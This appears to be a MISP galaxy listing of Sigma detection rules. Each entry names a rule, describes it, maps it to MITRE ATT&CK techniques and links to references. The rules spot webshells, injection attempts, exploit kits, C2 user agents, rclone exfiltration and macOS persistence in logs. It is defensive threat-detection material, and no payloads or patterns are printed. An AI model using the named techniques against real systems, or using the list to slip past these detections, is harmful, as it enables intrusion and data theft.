  • related-to: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 11383. Table References

Links

https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/activity_logs/azure_keyvault_secrets_modified_or_deleted.yml

Nginx Core Dump

Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.

The tag is: misp-galaxy:sigma-rules="Nginx Core Dump"

Nginx Core Dump has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004" with estimative-language:likelihood-probability="almost-certain"

Table 11386. Table References

Links

https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/

https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps

https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/nginx/web_nginx_core_dump.yml

Apache Threading Error

Detects an entry in Apache logs that reports threading-related errors.

The tag is: misp-galaxy:sigma-rules="Apache Threading Error"

Apache Threading Error has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 11387. Table References

Links

https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md

https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/apache/web_apache_threading_error.yml

Apache Segmentation Fault

Detects a segmentation fault error message caused by a crashing Apache worker process.

The tag is: misp-galaxy:sigma-rules="Apache Segmentation Fault"

Apache Segmentation Fault has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004" with estimative-language:likelihood-probability="almost-certain"

Table 11388. Table References

Links

http://www.securityfocus.com/infocus/1633

https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/apache/web_apache_segfault.yml

Windows Webshell Strings

Detects common commands used in Windows webshells

The tag is: misp-galaxy:sigma-rules="Windows Webshell Strings"

Windows Webshell Strings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11389. Table References

Links

https://bad-jubies.github.io/RCE-NOW-WHAT/

https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_win_webshells_in_access_logs.yml

JNDIExploit Pattern

Detects an exploitation attempt using the JNDI-Exploit-Kit.

The tag is: misp-galaxy:sigma-rules="JNDIExploit Pattern"

JNDIExploit Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11390. Table References

Links

https://githubmemory.com/repo/FunctFan/JNDIExploit

https://github.com/pimps/JNDI-Exploit-Kit

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_jndi_exploit.yml

SQL Injection Strings In URI

Detects potential SQL injection attempts via GET requests in access logs.

The tag is: misp-galaxy:sigma-rules="SQL Injection Strings In URI"

SQL Injection Strings In URI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11391. Table References

Links

https://github.com/payloadbox/sql-injection-payload-list

https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/

https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection

https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/

https://brightsec.com/blog/sql-injection-payloads/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_sql_injection_in_access_logs.yml

F5 BIG-IP iControl Rest API Command Execution - Webserver

Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP

The tag is: misp-galaxy:sigma-rules="F5 BIG-IP iControl Rest API Command Execution - Webserver"

F5 BIG-IP iControl Rest API Command Execution - Webserver has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11392. Table References

Links

https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash

https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029

https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_f5_tm_utility_bash_api_request.yml

Source Code Enumeration Detection by Keyword

Detects source code enumeration that uses GET requests with keyword searches in URL strings.

The tag is: misp-galaxy:sigma-rules="Source Code Enumeration Detection by Keyword"

Source Code Enumeration Detection by Keyword has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 11393. Table References

Links

https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1

https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_source_code_enumeration.yml

Cross Site Scripting Strings

Detects XSS attempts injected via GET requests in access logs

The tag is: misp-galaxy:sigma-rules="Cross Site Scripting Strings"

Cross Site Scripting Strings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

Table 11395. Table References

Links

https://github.com/payloadbox/xss-payload-list

https://portswigger.net/web-security/cross-site-scripting/contexts

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_xss_in_access_logs.yml

Path Traversal Exploitation Attempts

Detects path traversal exploitation attempts

The tag is: misp-galaxy:sigma-rules="Path Traversal Exploitation Attempts"

Path Traversal Exploitation Attempts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11396. Table References

Links

https://github.com/projectdiscovery/nuclei-templates

https://book.hacktricks.xyz/pentesting-web/file-inclusion

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_path_traversal_exploitation_attempt.yml

Suspicious User-Agents Related To Recon Tools

Detects known suspicious (default) user-agents related to scanning/recon tools.

The tag is: misp-galaxy:sigma-rules="Suspicious User-Agents Related To Recon Tools"

Suspicious User-Agents Related To Recon Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11397. Table References

Links

https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb

https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92

https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_susp_useragents.yml

Webshell ReGeorg Detection Via Web Logs

Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg.

The tag is: misp-galaxy:sigma-rules="Webshell ReGeorg Detection Via Web Logs"

Webshell ReGeorg Detection Via Web Logs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11398. Table References

Links

https://github.com/sensepost/reGeorg

https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_webshell_regeorg.yml

Successful IIS Shortname Fuzzing Scan

When IIS uses an old .NET Framework, it is possible to enumerate folders using the "~" symbol.

The tag is: misp-galaxy:sigma-rules="Successful IIS Shortname Fuzzing Scan"

Successful IIS Shortname Fuzzing Scan has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11399. Table References

Links

https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml

https://www.exploit-db.com/exploits/19525

https://github.com/lijiejie/IIS_shortname_Scanner

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml

Suspicious Windows Strings In URI

Detects suspicious Windows strings in URIs, which could indicate possible exfiltration or webshell communication.

The tag is: misp-galaxy:sigma-rules="Suspicious Windows Strings In URI"

Suspicious Windows Strings In URI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 11400. Table References

Links

https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_susp_windows_path_uri.yml

Server Side Template Injection Strings

Detects SSTI attempts sent via GET requests in access logs

The tag is: misp-galaxy:sigma-rules="Server Side Template Injection Strings"

Server Side Template Injection Strings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"

Table 11401. Table References

Links

https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

https://github.com/payloadbox/ssti-payloads

https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_ssti_in_access_logs.yml

PUA - Advanced IP/Port Scanner Update Check

Detects the update check performed by Advanced IP/Port Scanner utilities.

The tag is: misp-galaxy:sigma-rules="PUA - Advanced IP/Port Scanner Update Check"

PUA - Advanced IP/Port Scanner Update Check has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Gather Victim Network Information - T1590" with estimative-language:likelihood-probability="almost-certain"

Table 11402. Table References

Links

https://www.advanced-port-scanner.com/

https://www.advanced-ip-scanner.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_pua_advanced_ip_scanner_update_check.yml

HackTool - Empire UserAgent URI Combo

Detects user agent and URI paths used by Empire agents.

The tag is: misp-galaxy:sigma-rules="HackTool - Empire UserAgent URI Combo"

HackTool - Empire UserAgent URI Combo has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11403. Table References

Links

https://github.com/BC-SECURITY/Empire

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_hktl_empire_ua_uri_patterns.yml

APT User Agent

Detects suspicious user agent strings used in APT malware in proxy logs

The tag is: misp-galaxy:sigma-rules="APT User Agent"

APT User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11404. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_apt.yml

Potential Base64 Encoded User-Agent

Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.

The tag is: misp-galaxy:sigma-rules="Potential Base64 Encoded User-Agent"

Potential Base64 Encoded User-Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11405. Table References

Links

https://blogs.jpcert.or.jp/en/2022/07/yamabot.html

https://deviceatlas.com/blog/list-of-user-agent-strings#desktop

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_susp_base64.yml

Bitsadmin to Uncommon TLD

Detects Bitsadmin connections to domains with uncommon TLDs

The tag is: misp-galaxy:sigma-rules="Bitsadmin to Uncommon TLD"

Bitsadmin to Uncommon TLD has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 11406. Table References

Links

https://twitter.com/jhencinski/status/1102695118455349248

https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml

HackTool - BabyShark Agent Default URL Pattern

Detects Baby Shark C2 Framework default communication patterns

The tag is: misp-galaxy:sigma-rules="HackTool - BabyShark Agent Default URL Pattern"

HackTool - BabyShark Agent Default URL Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11407. Table References

Links

https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_hktl_baby_shark_default_agent_url.yml

Exploit Framework User Agent

Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs

The tag is: misp-galaxy:sigma-rules="Exploit Framework User Agent"

Exploit Framework User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11408. Table References

Links

https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_frameworks.yml

Windows WebDAV User Agent

Detects the WebDAV DownloadCradle technique via its user agent.

The tag is: misp-galaxy:sigma-rules="Windows WebDAV User Agent"

Windows WebDAV User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11409. Table References

Links

https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_downloadcradle_webdav.yml

Download from Suspicious Dyndns Hosts

Detects download of certain file types from hosts with dynamic DNS names (selected list)

The tag is: misp-galaxy:sigma-rules="Download from Suspicious Dyndns Hosts"

Download from Suspicious Dyndns Hosts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"

Table 11410. Table References

Links

https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_dyndns.yml

Suspicious User Agent

Detects suspicious malformed user agent strings in proxy logs

The tag is: misp-galaxy:sigma-rules="Suspicious User Agent"

Suspicious User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11411. Table References

Links

https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_susp.yml

Telegram API Access

Detects suspicious requests to Telegram API without the usual Telegram User-Agent

The tag is: misp-galaxy:sigma-rules="Telegram API Access"

Telegram API Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 11412. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/

https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/

https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_telegram_api.yml

Download From Suspicious TLD - Whitelist

Detects executable downloads from suspicious remote systems

The tag is: misp-galaxy:sigma-rules="Download From Suspicious TLD - Whitelist"

Download From Suspicious TLD - Whitelist has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 11413. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_tlds_whitelist.yml

HTTP Request With Empty User Agent

Detects potentially suspicious empty user agent strings in proxy logs, which could indicate an uncommon request method.

The tag is: misp-galaxy:sigma-rules="HTTP Request With Empty User Agent"

HTTP Request With Empty User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11415. Table References

Links

https://twitter.com/Carlos_Perez/status/883455096645931008

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_empty.yml

Windows PowerShell User Agent

Detects Windows PowerShell Web Access

The tag is: misp-galaxy:sigma-rules="Windows PowerShell User Agent"

Windows PowerShell User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11416. Table References

Links

https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_powershell.yml

Suspicious Network Communication With IPFS

Detects connections to the InterPlanetary File System (IPFS) containing a user's email address, which mirrors behaviour observed in recent phishing campaigns leveraging IPFS to host credential harvesting webpages.

The tag is: misp-galaxy:sigma-rules="Suspicious Network Communication With IPFS"

Suspicious Network Communication With IPFS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 11417. Table References

Links

https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638

https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11

https://blog.talosintelligence.com/ipfs-abuse/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml

Bitsadmin to Uncommon IP Server Address

Detects Bitsadmin connections to IP addresses instead of FQDNs.

The tag is: misp-galaxy:sigma-rules="Bitsadmin to Uncommon IP Server Address"

Bitsadmin to Uncommon IP Server Address has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

Table 11418. Table References

Links

https://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml

Rclone Activity via Proxy

Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string

The tag is: misp-galaxy:sigma-rules="Rclone Activity via Proxy"

Rclone Activity via Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 11419. Table References

Links

https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone

https://rclone.org/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_rclone.yml

Crypto Miner User Agent

Detects suspicious user agent strings used by crypto miners in proxy logs

The tag is: misp-galaxy:sigma-rules="Crypto Miner User Agent"

Crypto Miner User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11420. Table References

Links

https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h

https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_cryptominer.yml

F5 BIG-IP iControl Rest API Command Execution - Proxy

Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP

The tag is: misp-galaxy:sigma-rules="F5 BIG-IP iControl Rest API Command Execution - Proxy"

F5 BIG-IP iControl Rest API Command Execution - Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 11421. Table References

Links

https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash

https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029

https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_f5_tm_utility_bash_api_request.yml

Raw Paste Service Access

Detects direct access to raw pastes on various paste services, which malware often uses in its second stage to download malicious code in encrypted or encoded form.

The tag is: misp-galaxy:sigma-rules="Raw Paste Service Access"

Raw Paste Service Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"

Table 11422. Table References

Links

https://www.virustotal.com/gui/domain/paste.ee/relations

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_raw_paste_service_access.yml

Suspicious Base64 Encoded User-Agent

Detects suspicious encoded User-Agent strings, as seen used by some malware.

The tag is: misp-galaxy:sigma-rules="Suspicious Base64 Encoded User-Agent"

Suspicious Base64 Encoded User-Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 11423. Table References

Links

https://deviceatlas.com/blog/list-of-user-agent-strings#desktop

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_base64_encoded.yml

Download From Suspicious TLD - Blacklist

Detects download of certain file types from hosts in suspicious TLDs

The tag is: misp-galaxy:sigma-rules="Download From Suspicious TLD - Blacklist"

Download From Suspicious TLD - Blacklist has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 11424. Table References

Links

https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/

https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf

https://www.spamhaus.org/statistics/tlds/

https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml

PwnDrp Access

Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity

The tag is: misp-galaxy:sigma-rules="PwnDrp Access"

PwnDrp Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"

Table 11426. Table References

Links

https://breakdev.org/pwndrop/

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_pwndrop.yml

Hack Tool User Agent

Detects suspicious user agent strings used by hack tools in proxy logs.

The tag is: misp-galaxy:sigma-rules="Hack Tool User Agent"

Hack Tool User Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 11427. Table References

Links

http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules

https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_hacktool.yml

Flash Player Update from Suspicious Location

Detects a Flash Player update from an unofficial location.

The tag is: misp-galaxy:sigma-rules="Flash Player Update from Suspicious Location"

Flash Player Update from Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 11428. Table References

Links

https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_susp_flash_download_loc.yml

Search-ms and WebDAV Suspicious Indicators in URL

Detects URL pattern used by search(-ms)/WebDAV initial access campaigns.

The tag is: misp-galaxy:sigma-rules="Search-ms and WebDAV Suspicious Indicators in URL"

Search-ms and WebDAV Suspicious Indicators in URL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Infrastructure - T1584" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

Table 11429. Table References

Links

https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html

https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462

https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_webdav_search_ms.yml

Startup Items

Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.

The tag is: misp-galaxy:sigma-rules="Startup Items"

Startup Items has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Startup Items - T1037.005" with estimative-language:likelihood-probability="almost-certain"

Table 11430. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_startup_items.yml

MacOS Emond Launch Daemon

Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.

The tag is: misp-galaxy:sigma-rules="MacOS Emond Launch Daemon"

MacOS Emond Launch Daemon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Emond - T1546.014" with estimative-language:likelihood-probability="almost-certain"

Table 11431. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md

https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml

JXA In-memory Execution Via OSAScript

Detects possible malicious in-memory execution of JXA via OSAScript

The tag is: misp-galaxy:sigma-rules="JXA In-memory Execution Via OSAScript"

JXA In-memory Execution Via OSAScript has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 11432. Table References

Links

https://redcanary.com/blog/applescript/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jxa_in_memory_execution.yml

Suspicious Microsoft Office Child Process - MacOS

Detects suspicious child processes spawned from Microsoft Office suite applications such as Word or Excel. This could indicate malicious macro execution.

The tag is: misp-galaxy:sigma-rules="Suspicious Microsoft Office Child Process - MacOS"

Suspicious Microsoft Office Child Process - MacOS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Office Test - T1137.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 11433. Table References

Links

https://objective-see.org/blog/blog_0x4B.html

https://redcanary.com/blog/applescript/

https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml

Security Software Discovery - MacOs

Detects usage of system utilities (only grep for now) to discover security software

The tag is: misp-galaxy:sigma-rules="Security Software Discovery - MacOs"

Security Software Discovery - MacOs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 11434. Table References

Links

